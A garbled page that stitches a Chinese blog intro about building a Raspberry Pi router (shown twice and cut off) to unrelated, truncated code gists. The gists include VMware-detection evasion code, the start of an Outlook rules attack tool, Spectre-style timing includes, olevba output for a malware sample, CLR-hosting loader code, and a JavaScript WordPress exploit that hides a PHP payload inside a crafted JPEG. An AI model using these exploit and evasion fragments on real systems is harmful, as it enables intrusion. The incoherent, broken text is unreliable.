新款的树莓派3B功能之丰富,性能之强悍,让我垂涎。考虑到家里的网件 WNDR3700v2 也服役四年有余了。还是败了一个树莓派3B回来打造成新的路由。
WARNING
本文所有指令均仅供参考,切勿无脑复制粘贴!
〇 安装系统
/* | |
Detect VMWare using OEM String in Memory | |
Tested on Windows XP SP3/VMWare Workstation 7.1.0 | |
c0d3inj3cT | |
*/ | |
#include <windows.h> | |
#include <stdio.h> | |
#define MARKER "MS_VM_CERT" |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
// Base code taken from | |
// https://github.com/mfontanini/Programs-Scripts/blob/master/constexpr_hashes/md5.h | |
// and expanded to include a main function | |
#ifndef CONSTEXPR_HASH_MD5_H | |
#define CONSTEXPR_HASH_MD5_H | |
#include <array> | |
#include <iostream> | |
#include <cstdint> |
新款的树莓派3B功能之丰富,性能之强悍,让我垂涎。考虑到家里的网件 WNDR3700v2 也服役四年有余了。还是败了一个树莓派3B回来打造成新的路由。
WARNING
本文所有指令均仅供参考,切勿无脑复制粘贴!
〇 安装系统
# http://www.bouncycastle.org/csharp/ | |
$BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll' | |
$BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru | |
function Get-TrustedRootCertificateHash { | |
[OutputType([String])] | |
[CmdletBinding()] | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
TL;DR: Using symbolic execution to recover driver IOCTL codes that are computed at runtime.
The goal here is to find valid IOCTL codes for the HackSysExtremeVulnerableDriver by analyzing the binary. The control flow varies between the binary and source due to compiler optimizations. This results in a situation where only a few IOCTL codes in the assembly are represented as a constant with the remaining being computed at runtime.
The code in hevd_ioctl.py is a approximation of the control flow of the compiled IrpDeviceIoCtlHandler
function. The effects of the compiler optimization are more pronounced when comparing this code to the original C function. To comply with requirements of the PyExZ3 module, the target function is named after the script's filename, and the `ex
## uploaded by @JohnLaTwC | |
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
=============================================================================== | |
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
Type: OLE | |
------------------------------------------------------------------------------- |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |